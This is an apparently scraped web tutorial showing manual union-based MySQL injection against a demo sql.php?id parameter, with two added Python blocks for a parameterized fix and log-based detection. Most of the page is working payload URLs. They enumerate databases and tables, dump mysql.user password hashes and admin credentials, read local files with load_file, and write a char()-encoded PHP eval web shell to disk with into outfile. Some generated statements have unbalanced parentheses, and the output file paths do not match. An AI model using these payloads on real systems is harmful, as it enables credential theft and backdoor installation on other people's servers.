Demo of manual advanced mysql injection instance

Source: Internet
Author: User
Tags: mysql injection

To make hand-written SQL injection easy to follow, the examples use an injection point, sql.php, whose classic id parameter is not filtered: whatever is supplied as id is inserted straight into the SQL statement. You can import the database file test.sql to set up the test database.
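The root cause above, the unfiltered id parameter, shown beside its hardened form as an added example that is not from the original page. It uses an in-memory SQLite database as a stand-in for the page's test.sql (an assumption; the page's own MySQL schema is not given) so that it runs offline.

```python
import sqlite3

# Constructed stand-in for the page's test.sql: a three-column table that
# sql.php?id=... would query, plus the admin table the page dumps later.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    con.execute("INSERT INTO news VALUES (1, 'hello', 'first post')")
    con.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    con.execute("INSERT INTO admin VALUES ('admin', 'secret-hash')")
    return con

def lookup_unfiltered(con, id_param):
    """The page's injection point: the id parameter is pasted into the statement."""
    sql = "SELECT id, title, body FROM news WHERE id=" + id_param
    return con.execute(sql).fetchall()

def lookup_parameterized(con, id_param):
    """Hardened form: id must parse as an integer and is bound, never concatenated."""
    id_value = int(id_param)  # raises ValueError for anything that is not a number
    return con.execute("SELECT id, title, body FROM news WHERE id=?",
                       (id_value,)).fetchall()

def demo():
    """Run the page's column-count probe and admin dump against both versions."""
    con = make_db()
    probe = "1 union select 0,0,0"
    dump = "1 and 1=2 union select 1,username,password from admin"
    result = {
        "unfiltered_probe": set(lookup_unfiltered(con, probe)),
        "unfiltered_dump": lookup_unfiltered(con, dump),
        "parameterized_ok": lookup_parameterized(con, "1"),
    }
    try:
        lookup_parameterized(con, probe)
        result["parameterized_rejects"] = False
    except ValueError:
        result["parameterized_rejects"] = True   # the injected string never reaches SQL
    return result
```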


The injection uses the information_schema system database together with the group_concat() function. group_concat() is powerful because it returns many rows as one value, so the attacker does not have to page through results with limit.

http://www.bkjia.com/sql.php?id=1 union select 0,0,0

The query has 3 columns.

http://www.bkjia.com/sql.php?id=1 and 1=2 union select count(*),1,1 from mysql.user

Counts the number of users in mysql.user.

http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata

In testing, only root or an account with global privileges can read mysql.user and so expose all of the database users.
The statement above displays every database name on the MySQL server.

http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x74657374


This displays all the tables in the test database. 0x74657374 is the hex encoding of the string test, which avoids the need for quotes.

http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x61646D696E


This displays all the column names of the admin table (0x61646D696E is the hex encoding of admin).

The injection method is flexible and is not bound by the one-row-at-a-time limit.
Now let's look at the injection statements generated by Pangolin.

Only root or an account with global privileges can perform the following operations:

select user from mysql.user

http://www.bkjia.com/sql.php?id=1 and 1=2 union select concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1 from (select * from mysql.user order by user limit 6,1) t order by user desc) t limit 1 -- view the users in the database


http://www.bkjia.com/sql.php?id=1 and 1=2 union select concat(char(94),char(94),char(94),password,char(94),char(94),char(94)),1,1 from (select * from mysql.user order by user limit 6,1) t order by user desc) t limit 1 -- view the password of the corresponding user


Keep changing the limit offset (here limit 2,1) to step through every row:

http://www.bkjia.com/sql.php?id=1 and 1=2 union select concat(char(94),char(94),char(94),password,char(94),char(94),char(94)),1,1 from (select * from mysql.user order by user limit 2,1) t order by user desc) t limit 1 --


http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1,username,password from admin limit 0,10
http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1,username,password from admin limit 1,10
http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1,username,password from admin limit 2,10


These retrieve the records page by page using limit.

You can also use the group_concat() function to display everything at once:

http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1,group_concat(username),group_concat(password) from admin


Note the use of into outfile; the output path in this example is c:/2ww.php.

http://www.bkjia.com/sql.php?id=1 and 1=2 union select concat(char(60),char(63),char(112),char(104),char(112),char(32),char(101),char(118),char(97),char(108),char(40),char(36),char(95),char(80),char(79),char(83),char(84),char(91),char(99),char(109),char(100),char(93),char(41),char(63),char(62)),1,1 into outfile c:/cm14dd.php


The char() codes for `<?php eval($_POST[cmd])?>` are:

char(60),char(63),char(112),char(104),char(112),char(32),char(101),char(118),char(97),char(108),char(40),char(36),char(95),char(80),char(79),char(83),char(84),char(91),char(99),char(109),char(100),char(93),char(41),char(63),char(62)

http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1,<?php eval($_POST[cmd])?>,3 into outfile c:/tt33.txt


Using load_file

http://www.bkjia.com/sql.php?id=1 and 1=2 union select concat(char(94),char(94),char(94),load_file(0x633a5c626f6f742e696e69),char(94),char(94),char(94)),1,1 --

0x633a5c626f6f742e696e69 is the hex encoding of c:\boot.ini. The same request with the path written out directly:
http://www.bkjia.com/sql.php?id=1 and 1=2 union select 1,2,load_file('c:/boot.ini')
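From the defender's side, the payloads above share a small set of markers: union select, information_schema, group_concat(), mysql.user, into outfile, load_file(), and strings hidden as 0x hex literals or char() runs. The following added example (not from the original page) scans constructed web-server log lines for those markers and decodes the hidden strings so an analyst can see which database, table or file a request was aimed at; the log format and file names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures taken from the payload patterns shown on this page.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s+select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "mysql_user": re.compile(r"\bmysql\.user\b", re.I),
    "into_outfile": re.compile(r"\binto\s+outfile\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
}
HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})\b", re.I)      # e.g. 0x74657374
CHAR_CALL = re.compile(r"\bchar\s*\(\s*(\d+)\s*\)", re.I)  # e.g. char(94)

def decode_obfuscated_strings(query):
    """Recover the plain strings hidden in 0x... literals and char() runs."""
    found = [bytes.fromhex(h).decode("latin-1")
             for h in HEX_LITERAL.findall(query) if len(h) % 2 == 0]
    chars = "".join(chr(int(n)) for n in CHAR_CALL.findall(query))
    if chars:
        found.append(chars)
    return found

def analyze_request(raw_query):
    """URL-decode one query string; return (matched signatures, decoded strings)."""
    query = unquote_plus(raw_query)
    findings = sorted(name for name, rx in SIGNATURES.items() if rx.search(query))
    return findings, decode_obfuscated_strings(query)

# Constructed sample access-log lines (not taken from any real server).
SAMPLE_LOG = """\
GET /sql.php?id=1 HTTP/1.1
GET /sql.php?id=1+and+1%3D2+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema%3D0x74657374 HTTP/1.1
GET /sql.php?id=1+and+1%3D2+union+select+concat(char(94),load_file(0x633a5c626f6f742e696e69),char(94)),1,1-- HTTP/1.1
"""

def scan_log(text):
    """Return (path, findings, decoded strings) for every request that matches."""
    alerts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or "?" not in parts[1]:
            continue
        path, raw_query = parts[1].split("?", 1)
        findings, decoded = analyze_request(raw_query)
        if findings:
            alerts.append((path, findings, decoded))
    return alerts
```

The decoded strings are what make the alert actionable: "test" tells you which schema was enumerated, and "c:\boot.ini" tells you which file load_file() was pointed at.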
